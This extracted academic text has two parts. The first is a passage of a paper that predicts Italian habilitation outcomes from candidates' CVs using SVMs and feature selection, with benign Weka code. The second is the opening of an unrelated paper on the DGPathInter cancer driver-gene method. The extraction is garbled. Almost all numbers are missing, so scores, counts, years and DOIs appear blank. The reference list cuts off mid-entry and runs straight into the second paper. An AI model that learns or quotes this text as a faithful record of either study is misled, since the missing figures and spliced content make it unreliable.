we also investigated the performance of the svm learner on the data partitioned into the scientific areas in which rfs are organized. to do so, we split the dataset into partitions: nine for bibliometric sas ( - ), one for the macro sector /e (psychology), which is bibliometric, five for non-bibliometric sas ( - ), and one for the rfs /c , /d , /e , /e and /f , which are non-bibliometric. the results for both professional levels are summarized in fig. , and the whole data are reported in poggi et al. ( a). also in this case, the results are very accurate for both bibliometric and non-bibliometric disciplines, with f-measure scores spanning from a minimum of . ( -avm) and . ( -phy) for professional levels i and ii, to a maximum of . ( -hpp) and . ( -pss) for professional levels i and ii. we observe that, at the associate professor level, the performance for non-bibliometric sas (fig. d) is significantly better than for bibliometric sas (fig. c). moreover, the variance of the values is much lower for non-bibliometric sas, as shown by the boxplots, which are significantly more compressed.

analysis of the quantitative indicators of applicants
the objective of the next experiment is to identify a small set of predictors that allows us to perform accurate predictions of the asn results (rq2). to this end, we analyzed the relevance of the various predictors for classification purposes using the cfs algorithm described in 'feature selection algorithm'. the first step of our investigation consists of splitting our training set into partitions corresponding to the two professional levels of the asn, and running the cfs filters on the data of each rf. we then produced a ranking of the selected predictors by counting the occurrences of each of them in the results of the previous computation. figure reports the top predictors for the two professional levels considered.
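the per-rf cfs selection and the counting step described above can be sketched with the weka attribute-selection api as follows. this is an illustrative sketch rather than the paper's code: it assumes one arff export per rf (passed on the command line), and the class attribute is assumed to be the last one.

```java
// illustrative per-rf cfs selection followed by a frequency ranking of the selected attributes.
// the arff files and their layout are assumptions made for the example.
import java.util.HashMap;
import java.util.Map;
import weka.core.Instances;
import weka.core.converters.ConverterUtils.DataSource;
import weka.attributeSelection.AttributeSelection;
import weka.attributeSelection.CfsSubsetEval;
import weka.attributeSelection.GreedyStepwise;

public class TopPredictorRanking {
    public static void main(String[] args) throws Exception {
        Map<String, Integer> counts = new HashMap<>();   // predictor name -> number of rfs selecting it
        for (String arff : args) {                       // e.g., one file per rf and level
            Instances data = DataSource.read(arff);
            data.setClassIndex(data.numAttributes() - 1);

            AttributeSelection selector = new AttributeSelection();
            selector.setEvaluator(new CfsSubsetEval());  // correlation-based subset evaluation
            selector.setSearch(new GreedyStepwise());    // greedy forward search over attribute subsets
            selector.SelectAttributes(data);

            for (int idx : selector.selectedAttributes()) {
                if (idx == data.classIndex()) continue;  // skip the class attribute itself
                counts.merge(data.attribute(idx).name(), 1, Integer::sum);
            }
        }
        counts.entrySet().stream()
              .sorted(Map.Entry.<String, Integer>comparingByValue().reversed())
              .limit(10)                                 // print the most frequently selected predictors
              .forEach(e -> System.out.println(e.getKey() + "\t" + e.getValue()));
    }
}
```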
we used the best overall learner that emerged from the aforementioned tests (i.e., svm) and applied it, for each academic level and rf, considering the top predictors. the results of our analysis on the rfs are summarized in fig. , and the whole data are reported in poggi et al. ( a). we observe that there has been a slight improvement in performances compared to those obtained using all the predictors: / ( %) and / ( . %) rfs have f-measure scores higher than . for professional levels i and ii, respectively. moreover, also in this case, the results for bibliometric and non-bibliometric rfs are similar. an analysis of the indicators selected as top predictors is presented in 'discussion'.

evaluation
in order to assess the predictive power of our approach, in this section we compare our best models with those that have been proposed in the literature to solve similar problems. as discussed in 'related work', three works are particularly relevant for this task: vieira's model ( a) based on rank ordered logistic regression, jensen's binomial regression model ( ), and the models developed by tregellas et al. ( ). a first analysis can be performed by comparing the information summarized in table about the sizes of the datasets and the scopes of these works with our investigation. by considering the number of authors and papers, we observe that our dataset is some orders of magnitude greater than the others: i.e., , authors (our work) vs. (vieira), , (jensen) and (tregellas) authors; , , papers (our work) vs. , papers (vieira).

figure : boxplots depicting the performance of the svm algorithm for academic levels i and ii. precision, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) sas.

we also remark that vieira's ( a) and tregellas's ( ) works are limited to very small samples of researchers from portugal and the united states, while our work and jensen's analyze a nationwide population. moreover, while the other works focused on a limited set of indicators (vieira's ( a) model is based on three indicators, jensen's ( ) on eight and tregellas's ( ) on ten), we extracted a richer set of indicators from candidates' cvs ( predictors). we also observe that, while our work and jensen's ( ) cover all the disciplines, vieira ( a) limits the analysis to seven disciplines in hard sciences, and tregellas ( ) to biomedical sciences. overall, our dataset is very wide and rich, and less exposed to issues (e.g., biases) than those used in the other three works.

figure : top predictors selected by the cfs filter for professional levels i (a) and ii (b). the x-axis shows how many times the predictors have been chosen by the cfs algorithm.

in order to evaluate the predictive power of our approach, we have to compare its performances with those of the aforementioned works. for this purpose, all the proposed predictive models must be tested on the same data. since none of the datasets used in the considered works are freely available, we decided to test the models on representative samples extracted from our dataset, and compare the results with our approach.
the first model proposed by vieira ( a) is based on a composite predictor that encompasses standard bibliometric indicators and that is obtained through factor analysis. unfortunately, the authors do not provide a definition of such a composite predictor, nor do they discuss the details of how it has been computed. given the lack of such information, we observed that it is impossible to replicate the model and decided to exclude vieira's ( a) model from this experiment. jensen's ( ) model is a binomial regression model based on eight indicators: h, hy, number of publications and citations, mean citations/paper, h/number of papers, age and gender. we decided to focus this analysis on the applicants to the associate professor level for two rfs: informatics ( /b ) and economics ( /a ). these two rfs have been chosen as representatives of bibliometric and non-bibliometric recruitment fields because they best meet two important criteria: (i) they received a very high number of applications; (ii) the two populations (i.e., those who attained the habilitation and those who did not attain it) are well balanced. for the same reason we also considered the sas "mathematics and computer science" (mcs- , bibliometric) and "economics and statistics" (ecs- , non-bibliometric). in this way we are able to assess the predictive power of the models at different levels of granularity, both for bibliometric and non-bibliometric rfs and sas.

figure : boxplots depicting the performance of the svm algorithm for academic levels i and ii using the top predictors. precision, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) rfs.

since the indicators used by jensen's ( ) models that were not present in our dataset (i.e., mean citations/paper, h/number of papers) could be derived from our data, we computed and added them to the test dataset. we then built the regression models using the aforementioned eight indicators and, as suggested by the authors, we also repeated the experiment using only the h-index, which has been identified as the indicator with the highest relevance. the results obtained by jensen's ( ) models and our models are reported in table .

table : comparison of the performances of our models (our-svm) with jensen's ( ) models using eight predictors (j-log ) and one predictor (j-log ). best precision, recall and f-measure values are in bold.

the results show that our approach outperforms jensen's regression models in all the considered rfs and sas. the only exception is the recall value of the regression model based only on the h-index (log ) for the mcs- area. however, we report that the relative f-measure, which is a measure of the overall model accuracy, is much lower than that of our model. this can be explained by considering the low model precision, which is probably caused by a high number of false positives.
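for concreteness, a hedged sketch of such a logit baseline with weka's logistic learner is given below. it is not the code used in the paper: the file name, the class label and the fold count are assumptions, and in practice the dataset would first be projected onto the eight baseline indicators.

```java
// illustrative logistic-regression baseline in the spirit of jensen's logit models
// (not the authors' code). file name, class label and fold count are assumptions.
// the input arff is assumed to contain only the eight baseline indicators plus the class.
import java.util.Random;
import weka.core.Instances;
import weka.core.converters.ConverterUtils.DataSource;
import weka.classifiers.Evaluation;
import weka.classifiers.functions.Logistic;

public class LogitBaseline {
    public static void main(String[] args) throws Exception {
        Instances data = DataSource.read("asn_baseline_indicators.arff"); // hypothetical export
        data.setClassIndex(data.numAttributes() - 1);                     // habilitation outcome

        Evaluation eval = new Evaluation(data);
        eval.crossValidateModel(new Logistic(), data, 10, new Random(1)); // fold count assumed
        int notQualified = data.classAttribute().indexOfValue("not_qualified"); // hypothetical label
        System.out.printf("logit baseline  P=%.3f  R=%.3f  F=%.3f%n",
                eval.precision(notQualified), eval.recall(notQualified), eval.fMeasure(notQualified));
    }
}
```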
by comparing the f-measure values of the models we also observe that the regression models have the worst performances in non-bibliometric fields and areas (i.e., rf /a and sa ecs- ). the main reason is that the quantitative indicators used by jensen's ( ) models, which are mostly bibliometric, do not provide enough information for performing accurate predictions for non-bibliometric disciplines. in contrast, our approach is more stable, and leads to similar results in all rfs and sas. the ability of our model to manage the variability of the different disciplines can be explained by the richness of the dataset on which the model is based.

we also compared the performance of our approach with tregellas et al.'s ( ) two best models based on three indicators: sex, date of graduation, and number of first-author papers. as in the previous experiment, we decided to perform the test on two rfs, one bibliometric and one non-bibliometric, following the aforementioned criteria. as representative of bibliometric rfs we chose "molecular biology" ( /e ), since tregellas et al.'s ( ) work focused on the biomedical domain, and "economics" ( /a ) as representative of non-bibliometric rfs (as in the previous experiment). two out of the three indicators used by tregellas's models were not present in our dataset: the number of first-author papers and the date of graduation. while the first indicator can be easily computed using the publication list in the candidates' cvs, the latter (i.e., the date of graduation) has to be gathered from external sources. unfortunately, no freely-available database contains this information. we then had to search the web for authoritative sources (such as professional cvs, personal web pages, etc.) and manually process them to find information about the candidates' education. for this reason, we decided to focus our analysis on a sample of randomly selected candidates for each of the considered rfs. the output test dataset has been used for our experiment. the results of our model and of tregellas et al.'s ( ) models based on linear regression and svm classifiers are reported in table .

table : comparison of the performances of our model (our-svm) with tregellas et al.'s ( ) two best models based on linear regression (t-lr) and support vector machines (t-svm). best precision, recall and f-measure values are in bold.

the results show that overall our approach outperforms tregellas's models. also in this case there is an exception: the recall value of tregellas's model based on svms in rf /e . however, by analyzing the relative f-measure, we note that the overall accuracy of tregellas's model is lower than that of our model: . for tregellas's svm-based model, and . for our model. this is caused by the high number of false positives produced by tregellas's predictive model, which consequently results in lower precision and f-measure values compared to our model. by comparing the f-measure values of the models, we observe that tregellas's models have very low performances in the non-bibliometric rf ( /a ). we also note that, even considering the specific discipline for which tregellas's models have been designed (i.e., rf /e , "molecular biology", which is a discipline in the biomedical domain), our model has better performances than the two tregellas regression models.
this confirms that our approach is more stable and general, being able to perform accurate predictions in very different rfs and disciplines. as discussed in the previous experiment, the ability of our models to manage the variability and specificity of different disciplines can be explained by the richness of the features in our datasets, which have been automatically extracted from candidates' cvs, and which are fundamental to accurately predict the result of complex human processes (such as evaluation procedures).

discussion
this research has been driven by the two research questions described in the introduction, which can be summarized as follows:
• rq1: is it possible to predict the results of the asn using only the information contained in the candidates' cvs?
• rq2: is it possible to identify a small set of predictors that can be used to predict the asn results?
the analyses presented in 'results' show that machine learning techniques can successfully resolve, with good accuracy, the binary classification problem of discerning between candidates who attained the habilitation and those who did not on the basis of the huge amount of quantitative data extracted from applicants' cvs. in fact, the results of the experiments for rq1 have f-measure values higher than . in / ( . %) rfs and in / ( %) rfs for academic levels i and ii, respectively. moreover, the performances are very similar and uniform for both bibliometric and non-bibliometric disciplines, and do not show a polarization of the results for the two classes of disciplines. through an attribute selection process we identified the top predictors, and the prediction models based on such predictors turned out to have f-measure values higher than . in / ( %) rfs and / ( . %) rfs for academic levels i and ii, respectively (rq2). also in this case, the results are uniform and equally distributed among bibliometric and non-bibliometric disciplines.

some interesting considerations can be made by analyzing and comparing the top predictors for the two academic levels (i.e., associate and full professor). first of all we remark that, as is obvious, many standard bibliometric indicators have been identified as relevant. in particular, seven of them are shared by both the associate and full professor levels: the number of publications with impact factor since ever (pub_if_all) and since (pub_if_y ), the number of publications with category (publication_with_category), the cumulative impact factor since ever (if_all) and in - (if_y ), and the number of journal papers since ever (journal) and since (journal_y ) (see fig. ). however, we note that the first predictor (i.e., the one selected by the feature selection algorithm for most of the rfs) for both levels is y_affiliation_same (i.e., the maximum number of years with affiliation to the same university). this is a non-bibliometric indicator which has not been considered by any of the papers reviewed in 'related work'. we note that this result is coherent with the italian model of academic careers, which is typically linear and inbreeding-based, meaning that most academics tend to stay in the same university from their basic studies up to their research career (aittola et al., ). we plan to further investigate the correlation between working at the same institution and success in the asn, and to analyze if there are differences among disciplines.
we also remark that there are interesting observations that concern each of the two levels and highlight peculiar aspects of each of them. for instance, we note that the year of birth (born_y) is among the top predictors for associate professor and not for full professor, suggesting that age may be a relevant feature for success at the beginning of an italian scholar's career. this result is analogous to the one presented in tregellas et al. ( ), in which a similar indicator (i.e., the date of graduation) is used for predicting the career outcomes of young researchers. conversely, years_no_pub (i.e., the number of years in which no papers written by the candidate have been published) is a relevant predictor for full professor and not for associate professor. an explanation of this fact is that evaluation committees may have considered continuity in publications as a relevant factor in the evaluation of candidates to the full professor level (e.g., for discerning between candidates who have been active throughout their careers and those who have not always been productive). also in this case, we plan to perform a deeper analysis of this point as future work.

an evaluation of the predictive power of our approach has been performed by comparing the results of our models with the best models that have been proposed in the literature to predict academic promotions. the comparison shows that our model outperforms jensen's ( ) binomial regression models and tregellas's models on both bibliometric and non-bibliometric disciplines. this outcome proves that it is possible to predict with good accuracy, through computational methods, the results of complex human processes such as peer-review assessments. moreover, the performance difference between the approaches is more evident for non-bibliometric disciplines. we observe that the better performance of our approach (overall and for non-bibliometric disciplines) is a direct consequence of the richness and quality of the predictors extracted from candidates' cvs. an explanation is that models which are mostly based on bibliometric indicators are not able to fully capture and explain all the different factors (e.g., cultural, social, contextual, scientific, etc.) that play a key role in peer-review evaluation processes.

conclusions
the results of this work are encouraging. we remark that the final goal of our work is not substituting evaluation committees by algorithms, but providing tools for supporting candidates, evaluators and policy makers involved in complex assessment processes such as the asn. a candidate may use our system to self-evaluate his/her cv. committee members could evaluate the consistency of their decisions across different evaluation sessions. in case of an appeal by rejected candidates to a higher panel, the panel itself could exploit our approach to analyze anomalies. our system could also be useful for a foreign scholar, who could get insight into how competitive his or her cv is against the italian benchmarks. also, policy makers could benefit from a system based on machine learning techniques such as the one presented in this paper in their decisions. at the local level, department heads and university presidents may evaluate people to recruit by estimating whether they would obtain the habilitation, since there are incentives to do so. at the national level, the government may consider the results of our analysis to simplify the evaluation process.
for instance, it could reduce the paperwork by focusing on the factors we identified as more relevant. moreover, as already discussed, our approach would help committee members to minimize anomalies in their decisions. this would have the benefit of minimizing the number of requests for reviews and appeals, saving the time of both academic and administrative staff. future directions of this research line consist in extending our analysis to more recent sessions of the asn, and in analyzing the impact of mobility on the careers of academics. it would also be interesting to consider the applicants who have not been correctly classified by the learner, in order to improve the approach and also to have a more precise understanding of the factors that have been most relevant for assessments of academics performed by humans, such as the asn.

acknowledgements
we thank andrea bonaccorsi (university of pisa) and riccardo fini (university of bologna), who provided important considerations and discussions on this work. we also thank the reviewers for their insightful comments.

additional information and declarations

funding
this research has been supported by the italian national agency for the assessment of universities and research (anvur) within the uniform representation of curricular attributes (urca) project (see articolo of the 'concorso pubblico di idee di ricerca' - bando anvur, february ). paolo ciancarini was also supported by cini (enav project) and by cnr-istc. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: italian national agency for the assessment of universities and research (anvur). cini (enav project). cnr-istc.

competing interests
silvio peroni is an academic editor for peerj computer science.

author contributions
• francesco poggi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. francesco poggi is the main contributor of this work and the principal investigator of the urca project that supported the research presented in this paper.
• paolo ciancarini and silvio peroni authored or reviewed drafts of the paper and approved the final draft.
• aldo gangemi analyzed the data and authored or reviewed drafts of the paper.
• andrea giovanni nuzzolese and valentina presutti authored or reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: the following github repository contains raw data and code: https://github.com/sosgang/asn -analysis. the data/input/ folder contains the input data, and the data/output/ folder contains the output data of the analyses and experiments. the src/ folder contains the java source code used to perform the analyses and experiments discussed in the paper. the target folder contains a packaged runnable jar to execute the analyses/experiments.

references
abramo g, d'angelo ca, caprasecca a. . allocative efficiency in public research funding: can bibliometrics help? research policy ( ): – doi . /j.respol. . . .
aha dw, kibler d, albert mk. . instance-based learning algorithms. machine learning ( ): – doi . /a: .
aittola h, kiviniemi u, honkimäki s, muhonen r, huusko m, ursin j. . the bologna process and internationalization—consequences for italian academic life. higher education in europe ( – ): – doi . / .
aksnes d. . a macro study of self-citation. scientometrics ( ): – doi . /a: .
bornmann l. . how to analyze percentile citation impact data meaningfully in bibliometrics: the statistical analysis of distributions, percentile rank classes, and top-cited papers. journal of the association for information science and technology ( ): – doi . /asi. .
bornmann l, daniel h-d. . selecting scientific excellence through committee peer review—a citation analysis of publications previously published to approval or rejection of post-doctoral research fellowship applicants. scientometrics ( ): – doi . /s - - - .
bornmann l, daniel h-d. . convergent validation of peer review decisions using the h index: extent of and reasons for type i and type ii errors. journal of informetrics ( ): – doi . /j.joi. . . .
bornmann l, haunschild r. . do altmetrics correlate with the quality of papers? a large-scale empirical study based on f prime data. plos one ( ):e doi . /journal.pone. .
bornmann l, wallon g, ledin a. . does the committee peer review select the best applicants for funding? an investigation of the selection process for two european molecular biology organization programmes. plos one ( ):e doi . /journal.pone. .
breiman l. . random forests. machine learning ( ): – doi . /a: .
cronin b, meho l. . using the h-index to rank influential information scientists. journal of the association for information science and technology ( ): – doi . /asi. .
danell r. . can the quality of scientific work be predicted using information on the author's track record? journal of the association for information science and technology ( ): – doi . /asi. .
di iorio a, peroni s, poggi f. . open data to evaluate academic researchers: an experiment with the italian scientific habilitation. in: issi - th international conference on scientometrics and informetrics, conference proceedings.
franceschet m. . a cluster analysis of scholar and journal bibliometric indicators. journal of the association for information science and technology ( ): – doi . /asi. .
franceschet m, costantini a. . the first italian research assessment exercise: a bibliometric perspective. journal of informetrics ( ): – doi . /j.joi. . . .
fu ld, aliferis cf. . using content-based and bibliometric features for machine learning models to predict citation counts in the biomedical literature. scientometrics ( ): – doi . /s - - - .
hall ma, holmes g. . benchmarking attribute selection techniques for discrete class data mining. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . .
ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . ibáñez a, armañanzas r, bielza c, larrañaga p. . genetic algorithms and gaussian bayesian networks to uncover the predictive core set of bibliometric indices. journal of the association for information science and technology ( ): – doi . /asi. . jensen p, rouquier j-b, croissant y. . testing bibliometric indicators by their prediction of scientists promotions. scientometrics ( ): – doi . /s - - - . john gh, langley p. . estimating continuous distributions in bayesian classifiers. in: proc. th conference on uncertainty in artificial intelligence. burlington: morgan kaufmann, – . keerthi ss, shevade sk, bhattacharyya c, murthy krk. . improvements to platt’s smo algorithm for svm classifier design. neural computation ( ): – doi . / . law. . rules concerning the organization of the universities, academic employees and recruitment procedures, empowering the government to foster the quality and efficiency of the university system (norme in materia di organizzazione delle università, di personale accademico e reclutamento, nonche’ delega al governo per incentivare la qualità e l’efficienza del sistema universitario), gazzetta ufficiale n. del gennaio - suppl. ordinario n. . available at http://www. gazzettaufficiale.it/eli/id/ / / / g /sg (accessed on march ). leydesdorff l. . how are new citation-based journal indicators adding to the bib- liometric toolbox? journal of the association for information science and technology ( ): – doi . /asi. . lindahl j. . predicting research excellence at the individual level: the impor- tance of publication rate, top journal publications, and top % publications in the case of early career mathematicians. journal of informetrics ( ): – doi . /j.joi. . . . marzolla m. . quantitative analysis of the italian national scientific qualification. journal of informetrics ( ): – doi . /j.joi. . . . poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asi. http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://www.gazzettaufficiale.it/eli/id/ / / / g /sg http://www.gazzettaufficiale.it/eli/id/ / / / g /sg http://dx.doi.org/ . /asi. http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /peerj-cs. ministerial decree . . redefinition of scientific disciplines (rideterminazione dei settori concorsuali), gazzetta ufficiale serie generale n. del - - —suppl. ordinario n. ). available at http://www.gazzettaufficiale.it/eli/id/ / / / a /sg (accessed on march ). nederhof aj, van raan af. . peer review and bibliometric indicators of scientific performance: a comparison of cum laude doctorates with ordinary doctorates in physics. scientometrics ( – ): – doi . /bf . norris m, oppenheim c. . citation counts and the research assessment exercise v: archaeology and the rae. journal of documentation ( ): – doi . / . nuzzolese ag, ciancarini p, gangemi a, peroni s, poggi f, presutti v. . do altmetrics work for assessing research quality? scientometrics ( ): – doi . /s - - -z. peroni s, ciancarini p, gangemi a, nuzzolese ag, poggi f, presutti v. . the practice of self-citations: a longitudinal study. arxiv preprint. arxiv: . (accessed on march ). poggi f, ciancarini p, gangemi a, nuzzolese ag, peroni s, presutti v. a. 
dgpathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways
jianing xi*, minghui wang* and ao li
school of information science and technology, university of science and technology of china, hefei, china
centers for biomedical engineering, university of science and technology of china, hefei, china
* these authors contributed equally to this work.
abstract
cataloging mutated driver genes that confer a selective growth advantage for tumor cells from sporadic passenger mutations is a critical problem in cancer genomic research.
previous studies have reported that some driver genes are not highly frequently mutated and cannot be tested as statistically significant, which complicates the identification of driver genes. to address this issue, some existing approaches incorporate prior knowledge from an interactome to detect driver genes which may be dysregulated by their interaction network context. however, altered operation of many pathways in cancer progression has been frequently observed, and prior knowledge from pathways is not exploited in the driver gene identification task. in this paper, we introduce a driver gene prioritization method called driver gene identification through pathway and interactome information (dgpathinter), which is based on a knowledge-based matrix factorization model with prior knowledge from both the interactome and pathways incorporated. when dgpathinter is applied on somatic mutation datasets of three types of cancers and evaluated by known driver genes, the prioritizing performances of dgpathinter are better than those of the existing interactome-driven methods. the top ranked genes detected by dgpathinter are also significantly enriched for known driver genes. moreover, most of the top ranked scored pathways given by dgpathinter are also cancer progression-associated pathways. these results suggest that dgpathinter is a useful tool to identify potential driver genes.
subjects bioinformatics, computational biology
keywords matrix factorization, prior knowledge, bioinformatics, data mining
corresponding author ao li, aoli@ustc.edu.cn; academic editor jaume bacardit
introduction
in the last decade, studies based on advanced dna sequencing technologies have highlighted the fact that the development and progression of cancer hinges on somatic abnormalities of dna (hudson et al., ; vogelstein et al., ; raphael et al., ). despite a small number of driver genes conferring a selective growth advantage for tumor cells, a considerable number of somatic mutations are sporadic passenger mutations that have no impact on the cancer process (sjöblom et al., ; youn & simon, ; dees et al., ; lawrence et al., ; hua et al., ; cho et al., ). for this reason, distinguishing driver genes from genes with passenger mutations is a critical challenge for understanding the genetic basis of cancer. at the same time, somatic mutations of genes in tumor samples can be efficiently detected by next generation sequencing technology (schuster, ; xiong et al., ; zhao et al., ), and enormous accumulated datasets of cancer genomic alterations have been provided by studies such as the cancer genome atlas (tcga) (weinstein et al., ) and the international cancer genome consortium (icgc) (hudson et al., ).
these large-scale datasets of cancer genomics offer us an unprecedented opportunity to discover driver genes from the somatic mutation profiles of tumor samples (kandoth et al., ; lawrence et al., , ; tamborero et al., ). to address the driver and passenger problem, many efforts have been undertaken to catalogue genes by comparing the mutation frequencies of the tested genes with the background mutation rates (bmrs) through statistical analysis (dees et al., ; lawrence et al., ; hua et al., ; sjöblom et al., ; youn & simon, ). for example, one previous study identifies genes with mutational significance by using a per-gene bmr (dees et al., ), and another research study on driver genes utilizes information on coverage and other genomic features, such as dna replication time, to estimate the bmrs of genes (lawrence et al., ). furthermore, bayesian approaches are also applied to estimate bmrs in detecting driver genes (hua et al., ). in addition, some other studies determine driver genes through the cancer mutation prevalence scores of genes in tumor samples (sjöblom et al., ) or the predicted impact on protein function and the mutational recurrence of genes (youn & simon, ). through these mutation frequency-based approaches, a number of statistically significant potential driver genes have been identified (dees et al., ; lawrence et al., ; an et al., ). nevertheless, although some driver genes are mutated at high frequencies among tumor samples, previous studies have reported that other driver genes are mutated at low frequencies, and the mutation frequencies of these genes are too low to be tested as statistically significant (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ). a prevalent assumption to explain this long tail phenomenon is that genes usually interact with other genes, and some genes with no mutation can be perturbed by their interacting neighbors (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ; cho et al., ). based on this assumption, many studies for driver gene identification have been proposed by incorporating interactome information as prior knowledge (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ; hofree et al., ; bashashati et al., ; cho et al., ). the interactome information is employed as a gene interaction network obtained from databases including irefindex (razick, magklaras & donaldson, ), string (szklarczyk et al., ) and others (prasad et al., ; lee et al., ; das & yu, ; khurana et al., ). for example, hotnet and hotnet use the idea of heat-diffusion to propagate the mutation frequency scores of genes through the network, and calculate significance scores of genes to identify potential driver genes (vandin, upfal & raphael, ; leiserson et al., ). nbs is an integrated method that propagates the mutations through the interaction network for each tumor sample as preprocessing, and uses matrix factorization to obtain mutation-based subtypes and the mutation profiles of each subtype (hofree et al., ), where the mutation profiles can be utilized to prioritize driver genes (hofree et al., ; shi, gao & wang, ). instead of using network propagation, muffinn prioritizes the genes by the mutational impact of their direct neighbors in the network context (cho et al., ).
in addition, interaction network information has also been used to predict patient-specific driver genes, which helps personalized analysis (hou & ma, ; jia & zhao, ; bertrand et al., ). through the network-based approaches, many novel potential driver genes have been discovered, which greatly complements the understanding of cancer driver genes (leiserson et al., ; raphael et al., ; cho et al., ). however, knowledge from pathways is not exploited in the aforementioned driver gene identification approaches. since the operation of many pathways has been frequently reported to be altered in cancer progression (parsons et al., ; cancer genome atlas research network, ; vaske et al., ), the knowledge from pathways is also important for understanding the roles of genes in cancer and thus can guide the identification of cancer driver genes. notably, some studies have cataloged pathway knowledge into publicly available databases, such as kegg (ogata et al., ), reactome (joshi-tope et al., ) and biocarta (nishimura, ), which have also been used to detect the perturbed pathways involved in the tested tumor samples in some previous efforts (subramanian et al., ; ng et al., ; li et al., ; ma et al., ). although the pathway information is used in these approaches, they are not designed to identify potential driver genes. meanwhile, the aforementioned driver gene detecting methods only use interactome information and not the pathway information. consequently, the already available knowledge from pathways remains an underexploited resource in the identification of potential driver genes, and there is a lack of an approach that can effectively integrate information from both the interactome and pathways as prior knowledge. in this article, we introduce driver gene identification through pathway and interactome information (dgpathinter), to discover potential driver genes from mutation data through a knowledge-based matrix factorization framework, where prior knowledge from pathways and the interaction network is efficiently integrated. by maximizing the correlation between the mutation scores of genes and the pathway scores according to their relations (chen & zhang, ), we can identify potential driver genes driven by prior knowledge from pathways. at the same time, we also use a graph laplacian technique to adopt information from an interaction network in the identification of driver genes (xie, wang & tao, ). in addition, we use the framework of matrix factorization to integrate the information of mutation profiles, interactome and pathways, which is capable of factorizing the gene mutation scores from different sets of tumor samples and helps dgpathinter address the tumor sample heterogeneity issue (lee et al., ; sill et al., ; zhou et al., ; xi & li, ). compared with our previous approach (xi, li & wang, ), dgpathinter is a revised computational model with additional prior information incorporated. although both dgpathinter and the previous approach (xi, li & wang, ) utilize a matrix factorization framework and network information, dgpathinter further considers prior information from pathways. in addition to driver gene identification, dgpathinter can provide highly scored pathways for the investigated tumor samples, while our previous approach could not.
when we apply dgpathinter and three existing interactome-driven methods on three tcga cancer datasets, the detection results of dgpathinter outperform those of the competing methods. the top ranked genes detected by dgpathinter are also highly enriched for known driver genes. we further investigate the top ranked scored pathways yielded by dgpathinter, demonstrating that most of these pathways are also associated with cancer progression. the remainder of the paper is organized as follows: “materials and methods” introduces the rationale and detailed techniques of our method dgpathinter. in “results”, we apply our method on three cancer datasets and evaluate dgpathinter against the three existing methods through known driver genes. finally, we discuss our future work and make a brief conclusion in “discussion”. the code of dgpathinter can be freely accessed at https://github.com/ustc-hilab/dgpathinter.
materials and methods
somatic mutation datasets
for the somatic mutation data of cancers, we focus on three types of cancers from tcga datasets, which include tumor samples from breast invasive carcinoma (brca) (cancer genome atlas network, ), tumor samples from glioblastoma multiforme (gbm) (cancer genome atlas research network, ) and tumor samples from thyroid carcinoma (thca) (cancer genome atlas research network, ). the somatic mutation data are downloaded from the cbioportal database (gao et al., ). the somatic mutation data are formed as a binary matrix (sample × gene) X_{n×p} (bashashati et al., ; hofree et al., ; kim, sael & yu, ), where n is the number of samples and p is the number of the tested genes. an entry of the matrix being 1 denotes that a mutation occurs in the respective gene and tumor sample, when compared with the germline (bashashati et al., ; hofree et al., ; kim, sael & yu, ). the network information used in this study is irefindex (razick, magklaras & donaldson, ), a highly curated interaction network containing , nodes (genes) and , edges (interactions). for the pathway information, we follow previous studies (park et al., ) and use the curated pathways from three databases, kegg (ogata et al., ), reactome (joshi-tope et al., ) and biocarta (nishimura, ), which are also downloaded from the previous study (park et al., ).
model of knowledge-driven matrix factorization
to efficiently identify potential driver genes from somatic mutation data, we use a knowledge-driven matrix factorization framework, which successfully integrates information from pathways and interaction networks. a brief overview of dgpathinter is illustrated in fig. 1. since many matrix factorization-based methods have been used for detecting abnormal genes from heterogeneous tumor samples (lee et al., ; sill et al., ; zhou et al., , ; xi & li, ; xi, li & wang, ), we introduce a matrix factorization framework into dgpathinter.
figure 1 a schematic diagram providing an overview of dgpathinter. [diagram: mutation matrix X (n×p) ≈ sample matrix S (n×k) × gene matrix G^T (k×p); prior information from pathways, tr{G^T F^T V}, with relationship matrix F (genes to pathways) and pathway score matrix V; prior information from the interactome, tr{G^T L G}, with laplacian matrix L of the network; the maximum mutation score is taken for each gene.]
in dgpathinter, we utilize prior knowledge from pathways and interactome information in our model. the two types of prior knowledge are integrated via a knowledge-driven matrix factorization framework. this matrix factorization framework decomposes the somatic mutation matrix as the multiplication of two low-rank matrices S_{n×k} = (s_1, ..., s_k) and G^T, with G_{p×k} = (g_1, ..., g_k), which is equivalent to the summation of k rank-one layers \(\sum_{i=1}^{k} s_i g_i^T\). the matrix S is a binary matrix, of which the entries represent the assignments of the samples to the rank-one layers. the entries of the matrix G^T denote the gene mutation scores for the samples in the rank-one layers. to integrate the pathway information into the analysis workflow, we project the gene scores in the matrix G onto their related pathways and maximize the covariance between the projection scores and the pathway scores, \(-\mathrm{tr}\{G^T F^T V\}\), where the bipartite matrix F represents the relationships between the genes and the pathways, and the entries of the non-negative pathway score matrix V_{m×k} represent the scores of the respective pathways in the rank-one layers. meanwhile, to incorporate interactome information from an interaction network, we introduce a graph laplacian regularization term \(\mathrm{tr}\{G^T L G\}\) on the matrix G, where the matrix L_{p×p} is the laplacian matrix of the interaction network. for each gene, we choose the maximal gene mutation score among the k rank-one layers from the matrix G and prioritize the driver genes. the top ranked genes are regarded as potential driver genes for further evaluations.
